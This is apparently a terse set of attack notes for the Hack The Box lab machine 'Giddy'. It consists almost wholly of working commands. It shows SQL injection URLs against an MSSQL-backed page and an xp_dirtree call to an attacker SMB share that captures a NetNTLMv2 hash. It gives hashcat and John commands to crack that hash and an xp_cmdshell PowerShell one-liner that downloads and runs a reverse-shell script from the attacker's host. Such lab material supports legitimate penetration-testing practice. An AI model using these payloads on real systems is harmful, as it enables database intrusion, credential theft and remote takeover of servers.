==============================================================================
[+] MSSQL-Server
==============================================================================
# Identify number of colums in the table
http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=18 order by 25 --
http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=18%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--

# Identify version of Database
http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=18 union select system_user,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version,@@version--

==============================================================================
[+] MSSQL Get Credentials and Cracking the NetNTLMv2 Hash
==============================================================================
# Create a simple SMB service in Linux
sudo impacket-smbserver Temporal $(pwd) -smb2support

# Execute funtion master.sys.xp_dirtree
http://giddy.htb/mvc/Product.aspx?ProductSubCategoryId=18; EXEC master.sys.xp_dirtree '\\10.10.14.28\Temporal',0,1;

# Create a hash.txt with hash inside and crack with Hashcat
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force

# Or Crack with John the Ripper
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

==============================================================================
[+] MSSQL Get Reverse Shell
==============================================================================
EXEC xp_cmdshell 'powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.28/Invoke-PowerShellTcp2.ps1');"
